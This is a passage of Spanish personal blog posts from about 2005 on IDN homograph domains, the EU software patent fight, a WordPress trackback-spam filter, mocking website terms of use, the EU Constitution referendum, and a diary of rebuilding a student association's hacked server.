De vez en cuando se produce una innovación en informática. Internet, el email, la web, la mensajería instantánea, etc… y ninguna ha sido fruto de MS.

Hoy mirando iFolder, de Novel, he tenido la sensación de que puede ser otra gran innovación, que nos cambie nuestra forma de trabajar, mucho más que con ventanas locas.

Merece la pena echarle un vistazo. Carpetas compartidas por internet de manera integrada por internet, backups distribuidos… se acabó eso de mandar a tus amigos las fotos en un zip, en un attachment de correo.

Organizando el congreso en Eurielec tenemos cada uno nuestra carpeta con cosas del congreso, todo bastante poco organizado, una copia en mi portátil, a veces el fichero que quiero está en una máquina y no en otra… con un sistema así, seguro que trabajaríamos mucho mejor.

Chema escribe en su blog sobre cómo solventar al menos de forma temporal el problema de seguridad que plantean los IDN.

Lo primero, es aclarar que los IDN son los Internacional Domain Names, es decir, nombres de dominio con caracteres no-ascii, como pueden ser la ñ, letras con acentos, e incluso letras chinas o cirílicas.

Efectivamente, el uso de IDN puede provocar problemas de seguridad en los navegadores que soportan IDN. Explorer queda fuera por una vez del mercado de los bugs, pero no por buena implementación, sino por falta de ella. Además la implementación en Firefox y otros navegadores de mozilla es impecable, no tiene fallos. ¿Entonces dónde está el problema? en los carácteres homógrafos, son distintos, pero tienen igual grafía. Así el caracter &#1072; (а) se parece terriblamente a la “a” normal (incluso juntas: аa aа ¿cuál es cuál?), y en una url pueden provocar confusión, que pienses que estás en un sitio cuando realmente estás en otro.

Mi opinión es que para nada se debería cambiar un ápice de la implementación de los navegadores. Donde se debería atajar el problema es en la raiz, en los pingües beneficios que obtiene Verisign y otros con los registros de nombres, aunque sean ilícitos.

Los registradores deberían tener una lista de los caracteres extendidos y sus equivalencias homógrafas en ascii, y cuando se solicite un dominio, como por ejemplo p&#1072;ypal.com, que se convierta al equivalente homógrafo, paypal.com y si está registrado, se deniegue el registro. Fácil, seguro, limpio.

No podemos pedir ahora a las personas sin conocimientos que miren en la barra de nosedónde la url de verdad que está cargando, ni marcar los caracteres IDN con otro color, por que no queda nada claro, y se exige mucho conocimiento al usuario. No. Controlar dominios fraudulentos debería ser como he dicho tareas de los registradores, que lo tienen además mucho más fácil que implementar parches y pseudo soluciones en todos los navegadores existentes.

Piensa en una cosa, animal, vegetal, objeto o mineral. Entra en Q20.net y vete contestando a las preguntas.

En la mayoría de los casos lo adivina ¡¡¡antes de las 20 preguntas!!! Piensa en un cerdo, un ornitorrinco, un móvil, una paleta de ping-pong, un helecho.

Desde luego es un curiosísimo ejemplo de una base de datos de lógica difusa, que además va aprendiendo de las respuestas. Dos ejemplos:

Estoy conjeturando que es un cerdo?
Sí , No , Casi
15. ¿Se puede pedir en un restaurante? Sí.
14. ¿Es pequeño? No.
13. ¿Es marrón? No.
12. ¿Se utiliza en los viajes? No.
11. ¿Es multicolor? No.
10. ¿Lo encontrarías en una granja? Sí.
9. ¿Es útil? Sí.
8. ¿Es de sangre fría? No.
7. ¿Es peludo? No.
6. ¿Vive en el bosque? No.
5. ¿Tiene cuatro patas? Sí.
4. ¿Se puede comprar en una tienda? Lo dudo.
3. ¿Puede nadar? Sí.
2. ¿Puede correr deprisa? Lo dudo.
1. Se clasifica como Animal

Estoy conjeturando que es un ornitorrinco?
Sí , No , Casi
17. ¿Suele ser de colores vivos? No.
16. ¿Es negro? Probablemente.
15. ¿Alegra a la gente? Lo dudo.
14. ¿Puede nadar? Sí.
13. ¿Vive en el bosque? No.
12. ¿Vive en los árboles? No.
11. ¿Vive en grupo (gregario)? No.
10. ¿Tiene columna vertebral? Sí.
9. ¿Se puede controlar? No.
8. ¿Es de sangre caliente? Sí.
7. ¿Vive en praderas? No.
6. ¿Tiene dientes? No.
5. ¿Es más pequeño que una hogaza de pan? A veces.
4. ¿Es pequeño? Sí.
¿Es carnívoro? No sé.
3. ¿Salta? No.
¿Es herbívoro? No sé.
2. ¿Se puede comprar en una tienda? No.
1. Se clasifica como Animal

La palma se la ha llevado cuando he pensado en un somormujo, y tb lo ha adivinado:

Estoy conjeturando que es un somorgujo?
Sí , No , Casi
15. ¿Le gusta jugar? No.
14. ¿Puede nadar? Sí.
13. ¿Es vegetariano? No.
12. ¿Lo encontrarías en una granja? No.
11. ¿Es más grande que un microondas (o una panera)? No.
10. ¿Tiene patas? Sí.
9. ¿Es peligroso? No.
8. ¿Tiene pelo? No.
7. ¿Tiene una cola larga? No.
6. ¿Es carnívoro? No.
5. ¿Lo hay de muchas clases? No.
4. ¿Es multicolor? Sí.
3. ¿Se puede jugar con esta cosa? No.
2. ¿Puede correr deprisa? Probablemente.
1. Se clasifica como Animal

Ahora los más salidos ya tienen otro aliciente para aprender a usar linux, y podrán mantener la atención mucho más fácilmente, con el proyecto de videos de Linux Virgin.

Recuerda que si lo que quieres es aprender hacking, también puedes…

¿Puede haber gente más loca por el mundo? (Bush no cuenta). XDD

Buscando empresas para el Congreso de EESTEC que estamos organizando en Eurielec he topado sin querer con la web de las leches pascuales.

Pues abajo hay un enlace a “Condiciones Generales de Uso“, que parece un acuerdo por el cual si usas su web te comprometes a donar tus órganos internos en vida, por que madre mía… Empieza con una sección de identificación de las partes… “Los términos y condiciones que a continuación se indican regulan el acceso y el uso de la dirección URL www.leche…” ¿ein? acaso tienen derecho a someterme a condiciones legales sin que yo firme nada??? Ah, y menos mal que es una dirección URL… XDDD.

“Y, de otra parte, la persona física o jurídica , en adelante EL USUARIO, que accede a la página para informarse y hacer uso de los servicios ofertados a través del portal.
Mediante la utilización del presente portal el usuario acepta expresamente todas y cada una de las presentes condiciones generales, así como todas aquellas condiciones particulares recogidas para la utilización de determinados servicios.[…]”

¡Y un huevo! Si no me obligan a aceptar las condiciones ni a firmarlas no tengo por qué cumplirlas. Si no me voy a hacer de oro poniendo unas condiciones de uso en mi blog por las que todos los que entren aceptan expresamente donar sus órganos en vida. :P

Más perlitas de las condiciones de uso:

“Para acceder al Portal, el USUARIO debe contar con un acceso a la Red Internet, abonar las tarifas de acceso y conexión correspondientes y tener el equipo y los sistemas informáticos necesarios para realizar la conexión a la Red”

Juasss… así que si soy moroso con mi proveedor no tengo derecho a entrar en su web. Y preguntaré en la universidad, a ver cuanto tengo que pagar… En cuanto al resto… ejem, si estoy viendo las putas condiciones estas de la risa, será por que tengo un equipo, ¿no?

“Se obliga a usar el Portal, los Servicios y los Contenidos de forma diligente, correcta y lícita y, en particular, se compromete a abstenerse de:”

Obli-qué???

“i. Reproducir o copiar, distribuir, permitir el acceso del público a través de…”

¿Y el derecho a cita?

“iii.Utilizar los foros puestos a disposición por GRUPO LECHE PASCUAL, para insertar mensajes que no tengan relación directa con la temática del foro, en particular, contenidos ilegales, ilícitos, difamatorios o cualquier otro que pudiera…”

Jo, y yo como un idiota poniendo técnicas anti-spam en mi blog en vez de una notita como esa… ains…

“iv. Asimismo el Usuario se obliga a, en caso de que le fueran facilitadas por GRUPO LECHE PASCUAL contraseñas para el acceso a determinadas partes o servicios de la web, custodiarlas diligentemente, mantenerlas en secreto, y a asumir las consecuencias o perjuicios económicos sufridos por la falta de diligencia de la custodia de las mismas.”

Voy a decirle a mi amigo registro (para los que no le conozcáis, pone unas passwords muy tontas) que nunca se registre en la web de los pascuales.

“b) El Portal: GRUPO LECHE PASCUAL, no controla ni garantiza la ausencia de virus ni de otros elementos en los Contenidos que puedan producir alteraciones en el sistema informático (software y hardware) …”

Esta si que es buena… Obligan y a la vez se eximen con unas condiciones que no tienes ni que aceptar… Y me encanta la referencia a esos virus que pueden “alterar el hardware"…

“6. PROPIEDAD INTELECTUAL E INDUSTRIAL
La totalidad de esta web site: texto, imágenes, marcas, gráficos, logotipos, botones, archivos de software, combinaciones de colores, así como la estructura, selección, ordenación y presentación de sus contenidos, se encuentra protegida por las leyes sobre Propiedad Intelectual e Industrial, quedando prohibida su reproducción, distribución, comunicación pública y transformación, salvo para uso personal y privado. “

¡Recordar, hasta el color de los calcetines del diseñador que hizo su mierda de web, y el estilo de la horrenda corbata del estúpido abogado que escribió esta bazofia de condiciones están protegidos por las leyes sobre Propiedad esas! Menos mal que al menos dice al menos lo de “salvo para uso personal y privado", pues existe derecho a copia privada…

“7. USO DE TECNOLOGÍA COOKIE.
[…]le informa de que la mayoría de los ‘browsers’ en la red permiten a los usuarios borrar los ‘cookies’ del disco duro de su ordenador, bloquearlos o recibir un mensaje antes de grabar un ‘cookie’, y que puede configurar su navegador para ser avisado en pantalla de la recepción de Cookies y para impedir su instalación en los discos duros. Para obtener ayuda sobre estas funciones acceda a las instrucciones o manuales del “browser” o de su navegador, o a la pantalla de ‘ayuda’.”

Aiisssssssssss… que me meo toooooooooooo!!! Deberían incluir su pedazo de explicación en futuros cursos sobre Internet.

“9. MENORES DE EDAD.
Queda prohibido el acceso y uso del portal a los menores de edad. Los formularios contenidos en la web no van dirigidos a personas menores de edad, GRUPO LECHE PASCUAL establece un método de bloqueo de registro a aquellas personas menores de 18 años[…]”

¿humf? ¿Me habré equivocado de sitio y es porno? ¿Las tetas de las vacas se consideran pornográficas?

Y al final nos resuelven las dudas:

“Las presentes condiciones están redactadas en español, y se encuentran sometidas a la legislación española vigente. Para cualquier tipo de controversia derivada de la utilización de los servicios ofrecidos o de los contenidos propios del portal, las partes, con la aceptación de estas Condiciones, se someterán a los Tribunales y Juzgados de Madrid capital (España).”

Estimados Lecheros Pascuales:

Deberían contratar a un webmaster o publicista serio en vez de a un abogado para poner contenidos en su web.
Respecto a sus condiciones de uso:
Que yo recuerde no he aceptado ni una sola de sus condiciones por que no me lo han exigido, y si me lo exigieran mandaría a freir espárragos su web. Así que ya saben por donde me paso cada uno de sus puntos.

Atentamente, EL USUARIO.

Esto ya pasa de castaño oscuro…

La Comisión Europea en un alarde de tozudez, parece que va a ignorar la petición del JURI para reiniciar el proceso de elaboración de la ley de patentes que ya comenté aquí. El JURI es la Comisión de Asuntos Jurídicos del Parlamento Europeo, y el Parlamento el órgano elegido por todos los europeos, así que su dictamen debería ser considerado muchísimo más.

Además Polonia, que ya se ha opuesto en otras ocasiones parece que no lo va a hacer en esta ocasión a no ser de que lo proponga otro país (¿se cumplirá la broma que hacemos mis amigos y yo? “En Polonia van a abrir muchas oficias de patentes…").

Si la ley pasa el Comité sin modificaciones, se volvería a presentar tal cual al Parlamento, donde es de suponer que tras el dictamen del JURI se rechazaría, pero es tremendamente peligroso, pues si se aprueba en el Parlamento la ley entraría en vigor muy pronto.

No se entiende como en una supuesta democracia, el Comité Europeo ignora continuamente el interés de los ciudadanos, expresado desde el Parlamento y organizadores en contra de las patentes, en pro del interés de unos lobbies que desean el negocio de las patentes.

Parece que la pequeña modificación a los trackbacks es bastante efectiva para evitar el spam en los trackback de mi blog.

De 98 intentos de meter spam sólo han colado 6, por que el navegador con el que se identifican los robots de spam va cambiando, y una vez fue un Lotus Notes, otras tres Opera y dos Firefox, y yo sólo descarto los que tienen MSIE como parte del nombre del navegador.

Estoy pensando en ampliar los filtros a otros navegadores, ya que, como ya dije, a los trackback llaman las aplicaciones de blog, no los navegadores, y todo este tipo de peticiones suelen ser fraudulentas, para colar la odiada publicidad hasta en la cocina.

La Comisión de Asuntos Jurídicos del Parlamento Europeo (JURI) ha solicitado por una mayoría clara y rotunda a la Comisión Europea que retire la directiva sobre patentes de software.

Esto deja a la Comisión, la que apoyaba fuertemente la directiva, con el culo al aire, er… en una situación complicada, decía. Si propone el mismo texto al Parlamento probablemente se rechace, basándose en la decisión previa de su comisión de asuntos jurídicos y que ya ha rechazado textos similares de la Comisión.

Así que probablemente esto signifique se la Comisión se tenga que comer la propuesta con patatas y hacer reformas sustanciales al contenido de la directiva, si quiere tener posibilidades y dejar de hacer el ridículo.

Uno de los parlamentarios del JURI señaló diversos actos “poco elegantes” de la Comisión, como no tomar en consideración ninguna de las sustanciales modificaciones propuestas por el Parlamento Europeo en anteriores fases de la tramitación de la directiva (y eso que supuestamente el Parlamento es el órgano más importante de la UE, el elegido por sus ciudadanos). Mencionó también que según los líderes de la industria, el texto propuesto por la Comisión si que permite patentes sobre software puro, preguntándose cómo la Comisión sigue defendiendo lo contrario (sólo patentes de software que estén relacionadas con avances en otros campos, que era una de las cosas que quería el Parlamento). La palabra que diferencia el software que es patentable es el adjetivo “técnico". Ya veo como serían las solicitudes de patentes: “algoritmo técnico para ordenar técnicamente arrays técnicos".

Además acusó a los gobiernos Alemán y Holandés de ignorar la opinión de sus parlamentos nacionales que estaban en contra de la directiva, así como señaló las maniobras de la presidencia de turno irlandesa, con patrocinio de MS, para tratar de ratificar la directiva sin votación ni discusión en reuniones del Consejo de Pesca y Agricultura.

Más información, como siempre en FFII, y un resumen algo menos denso de leer en Groklaw.

Arg… yo también he sufrido la plaga del spam en los trackbacks, al igual que Chema…

Afortunadamente es infinitamente más cómodo borrarlos en WordPress que en el antiguo Movable Type, pero aun así resulta molesto.

Mirando los logs, se nota cómo se lo llegan a currar los spammers:

1. Accede a tu web un navegador “Multimap Geotag Blog Parser/1.23″ desde una IP.
2. Al poco, empiezas a recibir llamadas a los trackback de diversos artículos, desde distintas IPs y coordinadamente, no todas a la vez. Parece un spammer que controla varios ordenadores y va dando órdenes en un canal de IRC o similar.
3. Aunque hay diversas variantes, parece que se identifican como navegadores normales -explorer 6.0- (craso error, pues ese tipo de enlaces no los llaman los navegadores, sino los blogs)

Basándome en esto, un par de simples líneas en el fichero wp-trackback.php me mantendrán a salvo de la mayoría del spam, al menos por una temporada, hasta que implemente algo más definitivo:

        @header('Content-Type: text/xml');

	
+        if (strpos($_SERVER[’HTTP_USER_AGENT’],’MSIE’)!==false)
+               trackback_response(1, ‘Sorry, this weblog does not allow you to trackback its posts.’);
	
        if (!get_settings(’use_trackback’))
                trackback_response(1, ‘Sorry, this weblog does not allow you to trackback its posts.’);

De paso envía una respuesta que hace parecer que mi blog no acepta ningún trackback, a ver si tienen bots inteligentes, detectan la respuesta y no siguen intentándolo. ¿Tendré suerte?. ¿O serán más bien tontos?. Con el detalle tan cutre de enviar ese navegador, dudo que sean tan listos, pero quién sabe.

Y ya que hablamos del WordPress… ¿alguien conoce qué filtro de entrada es más o menos inteligente, y no añade párrafos cuando metes contenido dentro de un tag <pre>, <code> o similares? Me estoy refiriendo al filtro que se aplica a las noticias que escribes para darles algo de formato [El que tengo ahora prácticamente lo único que hace es añadir <p>’s y encima lo hace mal… :( ]

¿De quien hablo? De nuestra querida Constitución Europea…

La verdad es que aún tengo sentimientos encontrados respecto al tratado que votaremos el próximo 20 de febrero.

Cuanto más me informo al respecto más me parece que defiende sobre todo intereses comerciales, y no tanto sociales o las libertades de los individuos, ni siquiera como ideales. Sé que todas las constituciones son vagas y difusas, máxime cuando tiene que englobar a tantos países y culturas, pero hay cosas que chirrían un poco, y se parecen más a las propuestas de los lobbies para aprobar patentes y derechos de autor que a una declaración de derechos.

En la web de Delegación de Alumnos de Teleco (DAT) hay una noticia al respecto donde se debate algo. También está el artículo de mi amigo Juan Antonio de que estudia las referencias a la Propiedad Intelectual en la futura constitución.

Hoy he recibido este mail en cadena de Bea, que aunque un poco partidista sí que plantea más dudas al respecto:

TRATADO DE CONSTITUCIÓN EUROPEA, ¿SÍ o NO?

INFÓRMATE ANTES DE VOTAR Y TEN EN CUANTA QUE SI NO VOTAS FAVORECERÁS LA OPCIÓN CONTRARIA, la del SÍ

Este simple formulario puede ayudarte a tomar una decisión ante el próximo referéndum de ratificación del Tratado de la Constitución Europea (20 de febrero de 2005).
SI
NO

• ¿Conoces el contenido del Tratado que se someterá a Referéndum el 20 de febrero de 2005?
• ¿Sabías que la Constitución Europea es de rango superior a la Constitución de cualquier Estado miembro?
• ¿Estás recibiendo información o crees que hay debate público sobre este Tratado?
• ¿Sabes que esta Constitución es la Ley Fundamental que afectará nuestra vida y la de las futuras generaciones?
• ¿Votarías una Constitución con un GRAVE DÉFICIT DEMOCRÁTICO en su proceso de ELABORACIÓN?
• ¿Ratificarías una Constitución que impone la PRIVATIZACIÓN de la SEGURIDAD SOCIAL, EDUCACIÓN y TRANSPORTES entre otros servicios y empresas públicas (Art.III-122, Art. III-166) y en la que ya no aparecen como Servicios Públicos, sino como “Servicios Económicos de Interés General"?
• ¿Sabías que en este texto aparece 78 veces la palabra “mercado", 27 la palabra “competencia", 3 veces “progreso social” y 1 “economía social de mercado"?
• ¿Ratificarías una Constitución que SUSTITUYE EL DERECHO AL TRABAJO POR el DERECHO A TRABAJAR? (Art. II-75) reduce a su mínima expresión la protección contra los despidos, el desempleo y la exclusión, el derecho a una pensión de vejez y el derecho a una vivienda.
• ¿Ratificarías una Constitución que NO ASEGURA la IGUALDAD DE GÉNEROS? (Art. III-116)
• ¿Sabías que una empresa que desarrolle su actividad en España podrá fijar su sede en otro país comunitario y que las condiciones salariales, derechos sociales, normativa del medio ambiente, etc. serán las de ese país? (Directiva Bolkenstein)
• ¿Ratificarías una Constitución que “potencia una mano de obra adaptable” ? (Art. III-203). La temida FLEXIBILIDAD tendría rango Constitucional.
• ¿Ratificarías una Constitución que subordina la UE a la OTAN e IMPONE AUMENTAR el gasto PÚBLICO militar? (Art. I- 41)
• ¿Ratificarías una Constitución que establece el PODER FINANCIERO (Banco Central Europeo) POR ENCIMA del poder político y la DEMOCRACIA?
• ¿Ratificarías una Constitución que MENOSCABA los DERECHOS SOCIALES Y LABORALES adquiridos en Europa tras siglos de lucha?
• ¿Votarías SÍ o NO porque así lo dice un político o comunicador?
• ¿Firmarías, sin conocerlo en detalle, un Contrato de más de 300 páginas que va a regir toda tu vida?
• ¿Sabías que para modificar el texto de la Constitución será necesario el acuerdo de los 25 estados miembros?

Por favor, cuenta tus “SÍ” y tus “NO". Si tienes más “SÍ” que “NO", “VOTA SÍ”

Ahora que quede bien claro, que como gane el SÍ a nosotros los trabajadores nos van a hacer mucho daño, ¿Sabía usted que en los EE.UU. ese país que nos presentan como ejemplo a seguir, hay 44 millones de habitantes, que no tienen acceso a la sanidad pública?

Pues así nos vamos a ver, aquí en esta Europa “civilizada".

Me adhiero a la perplejidad de Gatafunho, Chema y David Bravo. Éste último fue el original descubridor del “Kopirrait to rapao pa trás", es decir, el mal entendido copyright. Una página de fans que tiene el morro de imponer restricciones de copia por que han “necesitado mucho tiempo y dedicación” para copiar ellos el artículo de una revista en papel. Yo me preguno… Si hacen uso del derecho de cita, deberían saber que también el resto lo tiene, ¿no?.

Y el copyright de toda la página es ya de chiste: restringe la copia ¡hasta de ideas!. Mejor no les visito no vaya a ser que pille alguna idea, y me tenga que lobotomizar para devolvérsela.

Y te diré como eres… Y el pobre Bill Gates va y se deja una nota manuscrita tras una conferencia y la analizan. Al principio creían que era de Blair, y flipaban con los resultados, pero al final parece que pertenecía a nuestro queridíssssimo Billy.

Estas son algunas de las lindezas que detectan en su escritura: ’struggling to concentrate’, ‘not a natural leader’, ’struggling to keep control of a confusing world’ y ‘an unstable man who is feeling under enormous pressure’.

Pobresico… debería usar algo de su pasta para ir al psicólogo. XD

Si esto se confirma…

Como si no recibiéramos ya suficientes correos con virus, y suficientes ataques para ordenadores windows, que un XP sin parchear se infecta en internet antes que el tiempo que tardas en actualizarlo.

Parece que el banner que propuse para luchar contra el canon ha gustado bastante, y he recibido comentarios, sugerencias y correcciones de bastante gente, incluido Javier de la Cueva, promotor de la demanda.

Al final hemos estado hablando y hemos decidido hacer algunas correcciones:

• No mencionamos a la SGAE. Estamos en contra de cualquier canon, independientemente de quien lo imponga, no en contra de la SGAE.
• Hacemos incapié de que el CD y otros medios digitales son el papel del siglo XXI. En ellos guardamos nuestra información, la historia, los registros, nuestras creaciones, al igual que se hacía en libros en los siglos pasados.
• Facilitamos distintas versiones: Nos han hecho llegar alguna traducción, y Javier quería poder dar al banner distintas orientaciones: Al mundo del Software Libre, al del Derecho, al de los Fotógrafos, etc. simplemente cambiando el contenido de los CDs, para que les sea más fácil identificarse con el problema a todos los colectivos. Más adelante indico algunas instrucciones para los que quieran crear su propia versión.
• Correcciones linguísticas: a una palabra le sobraba un acento, y las cantidades con coma para separar los decimales, como corresponde al castellano y nos hizo notar un compañero.

Sin más dilación, aquí tenéis el nuevo banner:

Esta vez son 39 frames en 57 Kb, lo que no está nada mal. Los ficheros Gimp originales empleados los puedes descargar aquí, y como la otra vez bajo la flexible licencia de Atribución de Creative Commons.

Dentro del archivo van los siguientes ficheros:

• orig2.xcf: Es el fichero gimp original, con todos los objetos necesarios en distintas capas. El problema es que convertirlo a animación es un proceso lento y tedioso. Consiste en seleccionar las capas que quieres tener visibles para cada frame, seleccionarlo todo, hacer un “copiar visible", y pegar todo como capa en otra imagen. Así capa a capa se va haciendo cada frame de la animación.
• en_capas_2_normal.xcf: Este fichero gimp tiene cada frame ya generado en una capa, pero los textos son parte de cada frame, están como imagen y no son editables.
• en_capas_2_txt_editable.xcf: Este es el fichero ideal para cambiar los textos de los CDs. Los frames están ya generados, salvo la capa de texto, que es editable, y se puede cambiar. Una vez cambiados los textos, simplemente tienes que pegar TODAS las capas de texto, cada una en la capa inmediatamente inferior (haciendo un “Merge Down” en el selector de capas. Asegúrate de que la capa de abajo está como visible, o se pegará en la primera visible hacia abajo, en vez de la inmediatamente inferior).

En todos los casos, cuando tengais la animación cada frame en una capa, y en el nombre de la capa entre paréntesis el tiempo que se va a mostrar esa capa (por ejemplo “(500ms)” para 500 milisegundos) podéis previsualizarla Filtros->Animación->Reproducir. Cuando estéis satisfechos optimizar la animación Filtros->Animación->Optimice (for GIF). Luego sólo os queda guardarla como gif, y en las opciones que os salndrán seleccionar “salvar como animación", la conversión de colores automática, y en la siguiente ventana el método de colocar los frames “combine". Y ya tendréis vuestro gif animado personalizado. :)

Espero vuestros comentarios de nuevo…

[ Update: soy un despistado, y había puesto “papel del siglo XIX” en vez de XXI en el banner. Ya está corregido, menos mal que Chema se dió cuenta rápido. ]

Finalmente polonia nos volvió a salvar evitando la aprobación de la ley de patentes en la reunión de Pesca y Agricultura de la UE.

Hoy he recibido este correo electrónico sobre los siguientes pasos necesarios:

Patentes de software: exigir una nueva primera lectura
¡Estimado activo de la FFII !

Se ha retrasado de nuevo la adopción de la “posición común” del
Consejo Europeo sobre la directiva de patentes de software. Esto abre
otra ventana de oportunidad para que el Parlamento Europeo reinicie
todo el proceso, eliminando así el espantoso texto del Consejo del 18
de mayo del 2004.

Debido a que la situación política en Europa ha cambiado (por ejemplo,
gracias a las nuevas posturas de Polonia y Holanda) las futuras
negociaciones en el Consejo Europeo probablemente nos llevarán a un
resultado más aceptable.

Por otra parte, si no se devuelve la directiva al Parlamento,
sino que se continúa con una 2ª lectura, el Parlamento tendría que
arreglarla sujeto a unas condiciones extremadamente difíciles. La
segunda lectura requiere una mayoría absoluta de 367 votos
afirmativos, significando esto que, en realidad, un 60-70% de los
Parlamentarios Europeos que asistieran a la cámara plenaria habrían de
votar sí en cada enmienda. Esta reescritura completa ocurriría en un
período de sólo 3 á 4 meses. El fallo en la adopción de cualquier
enmienda crítica podría significar puertas de escape que al final
darían cabida a las patentes de software. Así, una reunión del JURI
(Comité de Asuntos Legales) el 2 ó 3 de febrero del 2005 podría dar al
Parlamento la oportunidad de exigir una nueva primera lectura
(remisión renovada), lo que podría ser la mejor salida.

Se puede encontrar más información en:

http://kwiki.ffii.org/Juri0501En
http://kwiki.ffii.org/RestartGuide0501En

También ayúdanos a difundir la palabra: únete a la Manifestación en la
Web y registra tu sitio web en http://demo.ffii.org/.

Nótese que hay también personas trabajando en sacar adelante un
punto del día de tipo B, por ejemplo en Holanda y Dinamarca, según
http://wiki.ffii.org/SwpatcninoEn. Si estás trabajando en esto, por
favor continúa con ello. Si no es así, lo mejor sería presionar a
cualquiera del JURI; si hay miembros del JURI de tu país ciertamente
esto es *lo mejor que puedes hacer ahora*. Así que investiga en el
documento arriba mencionado: http://kwiki.ffii.org/RestartGuide0501En .

Saludos cordiales,

Holger Blasum, blasum(ARROBA)ffii.org, Javier Candeira, Alberto Barrionueva

Si siempre te has preguntado como serás de mayor, o si fueras de raza asiática, o de raza negra, ahora tienes la oportunidad de averiguarlo, con el transformador de caras, un proyecto del Laboratorio de Percepción, de la Universidad de St Andrews.

Aquí van algunos ejemplos, a ver si adivináis de quien son… XDDD

Eso pasó el domingo 16, pasé del paraíso al infierno.

Sandra y yo hicimos una sensacional escapada de fin de semana a Granada, donde pude disfrutar de nuevo (y nunca me cansaré) de la Alhambra, y los barrios viejos de la ciudad, poblados por doquier de tiendas y ferviente actividad incluso en el frío invierno.

Imposible olvidar tampoco las raciones enoooormes de churros y a precios ridículos, y las tapas gratis -dignas de un rey- que te ponen con la caña o con la sangría.

Siempre que voy a Granada me vuelvo triste, pensando qué narices hacemos en la capital, con precios imposibles para salir a tomar algo con los amigos. Allí puedes tomar un par de cañas y cenar con las tapas que te ponen por menos de 3 euros, mientras que aquí te gastas casi eso en el transporte para ir a cualquier lado. En mi viaje a Valencia me pasó otro tanto de lo mismo, aunque en el caso de Granada la tradición de tapas hace aún más brusca la diferencia.

Pero la vuelta no era el infierno en sí. El infierno empezó con un mensaje que me enviaron mientras volvía en coche, diciendo que habían crackeado el servidor de nuestra asociación de estudiantes, Eurielec, y que habían fastidiado las páginas web e instalado algún demonio.

¡Genial! ¡Estupendo! En plena organización del Congreso de EESTEC quedarte sin web del congreso, sin servidor, y ponte a sanear y asegurar el servidor o reinstalarlo con el lío que tenemos.

Nada más llegar nos comentamos, y descubrí algunos procesos ejecutándose que no habían descubierto, y optamos por apagar la máquina para analizarla en frío y no correr más riesgos.

Este es el infierno que sufrí esa semana para restaurar el servidor, luchando casi más contra el maldito hardware que contra los crackers:

Inicio: Domingo de madrugada

• Unos capullos brasileños crackean cero (nuestro servidor)
  • Borran los index de la web. Sin hacer copias de nada.
  • Ponen su firma en la web, con un enlace a un desagradable video de una ejecución en Irak, y se jactan de “venganza de los países que apoyaron a la guerra".
  • Instalan unos cuantos procesos para controlar la máquina
  • Intentan instalar un módulo en el kernel para ocultar programas, ficheros y otras huellas (sin éxito)
• Nos damos cuenta
• Rinze toma las primeras acciones, matando algún proceso y recuperando algunos index.
• Consigo conectarme a Internet (nada más llegar del viaje)
• Descubro otro proceso sospechoso.
• Se decide apagar la máquina y reinstalar para evitar que la sigan controlando, y ver si se pueden recuperar cosas.
• Para que no se cuelgue todo logro entrar en las máquinas por la noche, desmontar los /home (que se guardaban en cero) y parar el servidor de correo (que ya no tiene dónde guardar el correo).

El Infierno: Lunes

• Tuesto una gentoo para montar los discos en read-only y analizarlos.
• Los discos duros de cero dan problemas.
• El ordenador se cuelga cada 2x3, sectores defectuosos, etc.
• Abandono la búsqueda de logs incriminatorios para centrarnos en reinstalar y recuperar servicios.
• Hago backup de lo que puedo a mi HD portátil, y las cosas del congreso las copio a seis (otro ordenador de la asociación) y grabo un CD.
• Se decide comprar nuevos HD y reinstalar.
• Voy corriendo a la beca, que ya subo tarde.
• Se compran nuevos HD.
• Me llevo cero a casa, javi me acerca los discos nuevos.
• Planifico la asignación de espacio, particiones, raid, etc.
• Intento instalar cero en mi casa por la noche, pero el instalador de ubuntu no es muy allá e instala mal el grub con discos en raid.
• Además los discos duros nuevos no los detecta la bios, y hay que instalar el grub en el disco duro pequeño, que tiene una partición boot en raid1 con las de los grandes.
• Logro instalar el grub a mano.
• El ordenador no arranca, parece que el disco pequeño tiene que ser además master para que la puta mierda de placa arranque.
• Cambio los discos, reinstalo, instalo el grub a mano.
• Arranca.
• Peta… el grub no encuentra el stage2 :?
• Me desespero
• Me acuesto

Mega infierno: Martes

• Empiezo a ver por que petaba el stage2 de grub.
• El disco duro pequeño también tiene sectores chungos: ¡Fieeestaaaa!
• Intento hacer particiones más pequeñas, a ver si al principio no tiene sectores dañados
• Desaparece misteriosamente las tablas de particiones de los discos grandes tras el reboot.
• No tengo una copia de como estaban las particiones. A reinstalar…
• Reinstalando con partición /boot más pequeña peta del todo el disco duro pequeño, y ya no se puede ni particionar.
• (Maldiciones varias censuradas para el público)
• Reinstalo desde el principio, pasando del disco pequeño (planeando arrancar desde disquete) e instalando -como no- el grub a mano.
• Ninguna disquetera de eurielec es capaz de grabar un disquete de arranque con el grub.
• (Maldiciones varias censuradas para el público)
• (Maldiciones varias censuradas para el público)
• Al final probando logro arrancar con los discos grandes engañando a la bios, poniendo los HD como definidos por el usuario. En anteriores ocasiones (con los HD antiguos) fallaba con el mensaje “Hard Disk Fail” pero con los nuevos parece que tira.
• Estaban definidos como del tipo usuario, de 640 mb y 8 gigas respectivamente (los dos son de 200 gigas XD ).
• Al arrancar linux sólo detecta bien el que estaba en la bios como de 8 gigas (por estar definido como LBA quizás). Los dispositivos raid se quejan amargamente, pero espero que no se haya petao todo again.
• Reinicio, cambio los dos discos en la bios como si fueran de 8 gigas, en LBA, arranco… El disco que antes era de 640 mb ha perdido la tabla de particiones.
• Arrancando en modo single, duplico las tablas de particiones del que si que se mantiene al que ha cascado con sfdisk, y soy capaz de formar de nuevo los raid.
• Rearranco y el ordenata no arranca. Rehacer las tablas de particiones ha debido joder el grub del sector de arranque.
• Intercambio los discos (por precaución había instalado el grub en los dos, y como la partición boot es RAID 1 todo debería funciona)
• y… Arranca!!!
• Vivan los raid con superbloque! Linux sabe recomponer los arrays raid y ver que partición va con cual, incluso en los RAID 0, a pesar del cambio de bus de los discos
• Algunos arrays no se han iniciado correctamente, por que tuvieron cambios cuando se arrancó el sistema sin uno de los discos. Añado las particiones marcadas como defectuosas con mdadmn en caliente, y los arrays se van regenerando.
• Parece que ya todo va a ir bien!!!
• subo a gio, y desde allí empiezo a instalar cosas, y me voy dando cuenta de la magnitud del pifostio de recuperar todo…
• (Maldiciones varias censuradas para el público)
• Reinstalando las bases de datos me doy cuenta que volcando la base de datos de la web de congreso (y el wiki) había dado un error (por un attachment demasiado grande) y en vez de seguir con las otras tablas, había parado
